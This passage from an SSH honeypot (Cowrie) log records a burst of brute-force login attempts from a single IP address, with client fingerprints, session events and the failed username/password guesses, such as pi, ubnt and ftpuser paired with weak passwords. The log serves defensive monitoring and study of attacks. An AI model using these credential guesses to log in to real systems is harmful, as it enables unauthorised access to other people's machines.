98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.058389Z","src_ip":"212.227.125.160","session":"39322e43a0fe"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ubnt","message":"login attempt [noc/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.095200Z","src_ip":"212.227.125.160","session":"a3aa63eeb093"}
{"eventid":"cowrie.login.failed","username":"student","password":"ftpuser","message":"login attempt [student/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.233459Z","src_ip":"212.227.125.160","session":"63d57026bc16"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.269005Z","src_ip":"212.227.125.160","session":"d348c28ce680"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.287748Z","src_ip":"212.227.125.160","session":"01ae44aa2c2a"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ftpuser","message":"login attempt [pi/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.349642Z","src_ip":"212.227.125.160","session":"39322e43a0fe"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ftpuser","message":"login attempt [ubnt/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.370042Z","src_ip":"212.227.125.160","session":"8fc2ba0ac868"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56806,"dst_ip":"1.2.3.4","dst_port":22,"session":"022ab9c80515","protocol":"ssh","message":"New connection: 212.227.125.160:56806 (1.2.3.4:22) [session: 022ab9c80515]","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.698842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.699489Z","src_ip":"212.227.125.160","session":"022ab9c80515"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.750761Z","src_ip":"212.227.125.160","session":"022ab9c80515"}
{"eventid":"cowrie.login.failed","username":"alexis","password":"alexis","message":"login attempt [alexis/alexis] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.908208Z","src_ip":"212.227.125.160","session":"022ab9c80515"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.184222Z","src_ip":"212.227.125.160","session":"a3aa63eeb093"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53966,"dst_ip":"1.2.3.4","dst_port":22,"session":"415c8bdd746e","protocol":"ssh","message":"New connection: 212.227.125.160:53966 (1.2.3.4:22) [session: 415c8bdd746e]","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.240324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.275658Z","src_ip":"212.227.125.160","session":"415c8bdd746e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.326312Z","src_ip":"212.227.125.160","session":"415c8bdd746e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.338088Z","src_ip":"212.227.125.160","session":"63d57026bc16"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.341790Z","src_ip":"212.227.125.160","session":"d348c28ce680"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.367617Z","src_ip":"212.227.125.160","session":"01ae44aa2c2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53968,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f12ec84e809","protocol":"ssh","message":"New connection: 212.227.125.160:53968 (1.2.3.4:22) [session: 6f12ec84e809]","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.380902Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53972,"dst_ip":"1.2.3.4","dst_port":22,"session":"2879e672a628","protocol":"ssh","message":"New connection: 212.227.125.160:53972 (1.2.3.4:22) [session: 2879e672a628]","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.400817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.410766Z","src_ip":"212.227.125.160","session":"6f12ec84e809"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53974,"dst_ip":"1.2.3.4","dst_port":22,"session":"03b802fa8b62","protocol":"ssh","message":"New connection: 212.227.125.160:53974 (1.2.3.4:22) [session: 03b802fa8b62]","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.423712Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.426710Z","src_ip":"212.227.125.160","session":"39322e43a0fe"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.442033Z","src_ip":"212.227.125.160","session":"8fc2ba0ac868"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.445980Z","src_ip":"212.227.125.160","session":"2879e672a628"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.446493Z","src_ip":"212.227.125.160","session":"2879e672a628"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.456079Z","src_ip":"212.227.125.160","session":"6f12ec84e809"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.461979Z","src_ip":"212.227.125.160","session":"03b802fa8b62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53986,"dst_ip":"1.2.3.4","dst_port":22,"session":"6288c5a5dcb0","protocol":"ssh","message":"New connection: 212.227.125.160:53986 (1.2.3.4:22) [session: 6288c5a5dcb0]","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.480373Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.496083Z","src_ip":"212.227.125.160","session":"03b802fa8b62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53994,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9da747b248e","protocol":"ssh","message":"New connection: 212.227.125.160:53994 (1.2.3.4:22) [session: c9da747b248e]","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.521347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.536124Z","src_ip":"212.227.125.160","session":"6288c5a5dcb0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.536939Z","src_ip":"212.227.125.160","session":"6288c5a5dcb0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.565102Z","src_ip":"212.227.125.160","session":"c9da747b248e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.565783Z","src_ip":"212.227.125.160","session":"c9da747b248e"}
{"eventid":"cowrie.login.failed","username":"student","password":"student","message":"login attempt [student/student] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.716282Z","src_ip":"212.227.125.160","session":"6f12ec84e809"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.746161Z","src_ip":"212.227.125.160","session":"2879e672a628"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"student","message":"login attempt [ftpuser/student] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.767985Z","src_ip":"212.227.125.160","session":"03b802fa8b62"}
{"eventid":"cowrie.login.failed","username":"noc","password":"ftpuser","message":"login attempt [noc/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.826016Z","src_ip":"212.227.125.160","session":"415c8bdd746e"}
{"eventid":"cowrie.login.failed","username":"pi","password":"student","message":"login attempt [pi/student] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.851374Z","src_ip":"212.227.125.160","session":"6288c5a5dcb0"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"student","message":"login attempt [ubnt/student] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.895183Z","src_ip":"212.227.125.160","session":"c9da747b248e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:28.962309Z","src_ip":"212.227.125.160","session":"022ab9c80515"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.799393Z","src_ip":"212.227.125.160","session":"6f12ec84e809"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.814348Z","src_ip":"212.227.125.160","session":"2879e672a628"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54002,"dst_ip":"1.2.3.4","dst_port":22,"session":"279a972ff669","protocol":"ssh","message":"New connection: 212.227.125.160:54002 (1.2.3.4:22) [session: 279a972ff669]","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.849405Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.866074Z","src_ip":"212.227.125.160","session":"03b802fa8b62"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.882486Z","src_ip":"212.227.125.160","session":"279a972ff669"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54010,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3cd4dd6da29","protocol":"ssh","message":"New connection: 212.227.125.160:54010 (1.2.3.4:22) [session: e3cd4dd6da29]","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.883355Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54024,"dst_ip":"1.2.3.4","dst_port":22,"session":"5512f5b30fab","protocol":"ssh","message":"New connection: 212.227.125.160:54024 (1.2.3.4:22) [session: 5512f5b30fab]","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.912564Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.913645Z","src_ip":"212.227.125.160","session":"415c8bdd746e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.923200Z","src_ip":"212.227.125.160","session":"6288c5a5dcb0"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.932479Z","src_ip":"212.227.125.160","session":"e3cd4dd6da29"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.932978Z","src_ip":"212.227.125.160","session":"e3cd4dd6da29"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.936917Z","src_ip":"212.227.125.160","session":"279a972ff669"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.946127Z","src_ip":"212.227.125.160","session":"5512f5b30fab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54036,"dst_ip":"1.2.3.4","dst_port":22,"session":"a819869ceaa0","protocol":"ssh","message":"New connection: 212.227.125.160:54036 (1.2.3.4:22) [session: a819869ceaa0]","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.963058Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:29.986259Z","src_ip":"212.227.125.160","session":"c9da747b248e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54048,"dst_ip":"1.2.3.4","dst_port":22,"session":"abd2ae84a919","protocol":"ssh","message":"New connection: 212.227.125.160:54048 (1.2.3.4:22) [session: abd2ae84a919]","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.003370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:30.005806Z","src_ip":"212.227.125.160","session":"a819869ceaa0"}
